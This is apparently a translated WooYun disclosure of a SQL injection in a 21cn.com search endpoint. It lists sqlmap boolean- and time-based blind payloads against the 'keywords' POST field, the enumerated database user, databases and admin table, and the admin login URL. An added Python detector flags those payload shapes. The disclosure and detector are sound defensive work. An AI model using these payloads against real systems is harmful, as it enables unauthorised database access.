Vulnerability summary

Defect ID: wooyun-2015-0112852

Title: SQL injection vulnerability on a 世纪龙 site

Vendor: 世纪龙信息网络有限责任公司

Author: 紫霞仙子

Submitted: 2015-05-08 16:27

Fixed: 2015-06-22 17:26

Published: 2015-06-22 17:26

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-05-08: Details sent to the vendor; awaiting vendor handling
2015-05-08: Vendor confirmed; details disclosed to the vendor only
2015-05-18: Details disclosed to core white hats and domain experts
2015-05-28: Details disclosed to regular white hats
2015-06-07: Details disclosed to intern white hats
2015-06-22: Details disclosed to the public

Brief description:

233

Detailed description:

http://ts.21cn.com/Home/so (POST)
channelId=41&keywords=1&view=/article/article/search

Proof of vulnerability:

---
Parameter: keywords (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: channelId=41&keywords=1') AND 8761=8761 AND ('hILz' LIKE 'hILz&view=/article/article/search
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: channelId=41&keywords=1') AND (SELECT * FROM (SELECT(SLEEP(5)))AaoW) AND ('hnji' LIKE 'hnji&view=/article/article/search
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
database management system users [1]:
[*] 'jtsuser'@'59.36.102.149'
available databases [2]:
[*] information_schema
[*] jutousu
Database: jutousu
Database: jutousu
Table: iic_admin
[8 entries]
Admin backend: http://ts.21cn.com/admin/login

Fix recommendation:

~~
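The report leaves the fix section empty. As an added example that is not part of the report, the check below flags POST bodies to the search endpoint whose decoded `keywords` value carries either of the two blind-injection shapes sqlmap reported above (a tautology after `AND`, or a `SLEEP(n)` call); the request bodies are constructed for the example, and a benign keyword containing an apostrophe is included to show it is not flagged.

```python
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies for /Home/so (not captured traffic). The last two
# reproduce the payload shapes the report's proof lists for the `keywords` field.
SAMPLE_BODIES = [
    "channelId=41&keywords=1&view=/article/article/search",
    "channelId=41&keywords=O%27Reilly+and+sons&view=/article/article/search",
    "channelId=41&keywords=1%27)+AND+8761%3D8761+AND+(%27hILz%27+LIKE+%27hILz"
    "&view=/article/article/search",
    "channelId=41&keywords=1%27)+AND+(SELECT+*+FROM+(SELECT(SLEEP(5)))AaoW)"
    "+AND+(%27hnji%27+LIKE+%27hnji&view=/article/article/search",
]

# Boolean-based blind: AND followed by a tautology, either n=n or ('x' LIKE 'x
# (the closing quote is supplied by the original query's own literal).
BOOLEAN_BLIND = re.compile(
    r"\bAND\s+(?:(\d+)\s*=\s*\1\b|\(\s*'(\w+)'\s+LIKE\s+'\2\b)", re.IGNORECASE
)
# Time-based blind: a SLEEP(n) call, as in the report's second payload.
TIME_BLIND = re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.IGNORECASE)


def classify(body: str) -> dict[str, list[str]]:
    """Return {field: [finding, ...]} for each form field whose URL-decoded value
    matches a blind-injection shape; an empty dict means the body looks clean."""
    findings: dict[str, list[str]] = {}
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            hits = []
            if BOOLEAN_BLIND.search(value):
                hits.append("boolean-blind")
            if TIME_BLIND.search(value):
                hits.append("time-blind")
            if hits:
                findings.setdefault(field, []).extend(hits)
    return findings


def scan(bodies: list[str]) -> dict[int, dict[str, list[str]]]:
    """Map each flagged body's index to its findings; clean bodies are omitted."""
    return {i: hits for i, body in enumerate(bodies) if (hits := classify(body))}


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_BODIES).items():
        print(f"body #{i}: {hits}")
```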

Copyright notice: please credit the source when reposting: 紫霞仙子@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-05-08 17:26

Vendor reply:

Thank you for your attention to the security of our business; based on your report, we have started handling the issue.

Latest status:

None yet